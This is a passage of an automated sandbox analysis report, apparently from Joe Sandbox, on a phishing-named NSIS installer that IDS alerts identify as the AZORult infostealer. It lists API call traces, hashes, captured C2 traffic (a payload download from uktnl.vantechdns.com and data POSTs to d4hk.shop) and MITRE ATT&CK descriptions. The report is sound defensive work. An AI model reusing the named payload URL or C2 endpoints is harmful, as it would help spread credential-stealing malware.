Instruction Fuzzy Hash: 5B11AE71E00108BFEB10EFA4DD89DAE76BCEB04358F10403AF904B21D1D6B85E419628

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,?,00000000), ref: 004051D9
Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8), ref: 004051EB
Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

Part of subcall function 004056FF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
Part of subcall function 004056FF: CloseHandle.KERNEL32(00409300), ref: 00405735

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: d05840a83a6cafba4798eec0c667da8025490c901309f1c51148aa89fdffafab
Instruction ID: f6705c9319aae76dbd7499045e6368890872edf6032e54a723c1862b254634bc
Opcode Fuzzy Hash: d05840a83a6cafba4798eec0c667da8025490c901309f1c51148aa89fdffafab
Instruction Fuzzy Hash: 7611A131900108EBCF21AFA1CD8499E7AB6EB04314F24407BF601B61E1C7798A819B9D

Function 0040564D Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00409300,00436800), ref: 00405690
GetLastError.KERNEL32 ref: 004056A4
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B9
GetLastError.KERNEL32 ref: 004056C3

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
Instruction ID: d2f3f002a39499475f228c0a6bab6309b881bedc09a5d6a8f103fb05119b383a
Opcode Fuzzy Hash: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
Instruction Fuzzy Hash: DE010871D14219EAEF119FA0CD047EFBFB8EB14314F10853AD909B6190E779A604CFAA

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,00403504,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,00403504,?), ref: 00402DE6

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
Instruction ID: e23ac89653febb243e72dcf23735aaa2031a226b5032255065ec6e4c9dbb6a99
Opcode Fuzzy Hash: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
Instruction Fuzzy Hash: B3F0F431909220EBC6516B54FD4C9DB7F75FB4571270149B7F001B11E4D7B95C818BAD

Function 00405ADB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C

Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10, 4<v,?,00436800,00405830,?,763C3420,00436800,00434000), ref: 00405A8C
Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9

lstrlenW.KERNEL32(00424F10,00000000,00424F10,00424F10, 4<v,?,00436800,00405830,?,763C3420,00436800,00434000), ref: 00405B34
GetFileAttributesW.KERNEL32(00424F10,00424F10,00424F10,00424F10,00424F10,00424F10,00000000,00424F10,00424F10, 4<v,?,00436800,00405830,?,763C3420,00436800), ref: 00405B44

Strings

4<v, xrefs: 00405ADD

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4<v
API String ID: 3248276644-1753321624
Opcode ID: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
Instruction ID: a8deb24d6afa2735206f329f0351f59021ff10951cf48c606255c952c9ad3203
Opcode Fuzzy Hash: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
Instruction Fuzzy Hash: CBF04921304E5215D622323A1C44AAF3554CFC1364705073BB861721E1CB3C9943DE7E

Function 004050F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405121
CallWindowProcW.USER32(?,?,?,?), ref: 00405172

Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141

Strings

, xrefs: 00405102

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
Instruction ID: 7511a9737e1ae187a562f2e55163cfa394ea92b9daba136d2a61478abf79871a
Opcode Fuzzy Hash: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
Instruction Fuzzy Hash: 41015E71A40709BBDF219F11DD84B6B3626E794754F144136FA017E1D1C3BA8C919E2D

Function 00405C23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C41
GetTempFileNameW.KERNEL32(00409300,?,00000000,?,?,?,00000000,00403268,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403496), ref: 00405C5C

Strings

nsa, xrefs: 00405C30

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
Instruction ID: 4fdac09ee551a982241d11f866b864b283b1b610f450d112551ccb25b2c02e5c
Opcode Fuzzy Hash: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
Instruction Fuzzy Hash: 0EF03676B04208BFEB108F55DD49E9BB7ADEB95750F10403AF901F7150E6B0AE548758

Function 004056FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425710,Error launching installer), ref: 00405728
CloseHandle.KERNEL32(00409300), ref: 00405735

Strings

Error launching installer, xrefs: 00405712

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
Instruction ID: 0e3d6bea0253e84bb75e95f5fd13ebb7f1c25267a9e23a2e11a0c59c818b3a51
Opcode Fuzzy Hash: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
Instruction Fuzzy Hash: A1E0BFB4A50209BFEB10AB64ED45F7B77ADE704604F408521BD10F6190D774A9118A79

Function 00406B18 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
Instruction ID: 5fe4abb7369df3af91b149f2edb7ea720d50bcc67b973f9abb1089395dd24c70
Opcode Fuzzy Hash: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
Instruction Fuzzy Hash: C0A14471E00229CBDF28CFA8C8546ADBBB1FF44305F11856AD956BB281C7785A96CF44

Function 00406D19 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
Instruction ID: 7dc68a506d8d0f3fe9b520a6289ddaa7cfd75a66a39107a8603bac83b987cce9
Opcode Fuzzy Hash: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
Instruction Fuzzy Hash: 58912370D00229CBDF28CFA8C854BADBBB1FF44305F15816AD956BB291C7789A96CF44

Function 00406A2F Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
Instruction ID: aa61b8b4d6b896fc10b82c5715850ba22d426d73d4dcb40af3c311b95fbd5bbf
Opcode Fuzzy Hash: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
Instruction Fuzzy Hash: 1B815671E00229CFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7789A96CF54

Function 00406534 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
Instruction ID: 6afa8d85982321809285efd67767f231e28451523f56623c0a237c64ba690010
Opcode Fuzzy Hash: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
Instruction Fuzzy Hash: 7E816731E00229DBDF24CFA9D844BADBBB0FB44305F11816AE856BB2C0C7785A96DF44

Function 00406982 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
Instruction ID: b0afa4bf9b2f32aef8b418d90c6ac84aec3754d6d6600e102a8a9184c58ea877
Opcode Fuzzy Hash: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
Instruction Fuzzy Hash: FD712471E00229DFDF24CFA8C844BADBBB1FB48305F15806AD846BB290C7395996DF54

Function 00406AA0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
Instruction ID: 02d0d75cb83947f83aad45c50880e4a386b83e744e149296eb7fa161ab999f08
Opcode Fuzzy Hash: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
Instruction Fuzzy Hash: 08714671E00219CFDF24CFA8C844BADBBB1FB44305F15806AD856BB290C7385956DF44

Function 004069EC Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
Instruction ID: eb15c3353e008649bdc799d0a197d89dfb60748dd6a42a5e4cae05a50034cddc
Opcode Fuzzy Hash: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
Instruction Fuzzy Hash: 67714571E00229DBDF28CF98C844BADBBB1FF44305F11806AD956BB291C7789A66DF44

Function 00405B59 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B81
CharNextA.USER32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B92
lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
Instruction ID: 1b7cebc677eab2b4d2404c83280ad7709bae0e65096c4b9ca61da70a623928b5
Opcode Fuzzy Hash: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
Instruction Fuzzy Hash: B9F06231504558AFC7029BA5DD40D9FBBB8EF06250B2540A9E800F7351D674FE019BA9

Source: Network traffic	Suricata IDS: 2029468 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M15 : 192.168.11.20:49754 -> 172.67.215.93:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.11.20:49754 -> 172.67.215.93:80
Source: Network traffic	Suricata IDS: 2029138 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M3 : 172.67.215.93:80 -> 192.168.11.20:49754
Source: Network traffic	Suricata IDS: 2029468 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M15 : 192.168.11.20:49755 -> 172.67.215.93:80

Source: global traffic	HTTP traffic detected: GET /Hpgcc91.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: uktnl.vantechdns.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /MI341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: d4hk.shopContent-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 3b 70 9d 3b 70 9d 37 13 8b 30 64 ed 42 10 8b 31 11 8b 30 65 8b 30 63 ec 26 66 9b 45 70 9d 35 70 9d 35 11 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp;p;p70dB10e0c&fEp5p5
Source: global traffic	HTTP traffic detected: POST /MI341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: d4hk.shopContent-Length: 43514Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: uktnl.vantechdns.com
Source: global traffic	DNS traffic detected: DNS query: d4hk.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
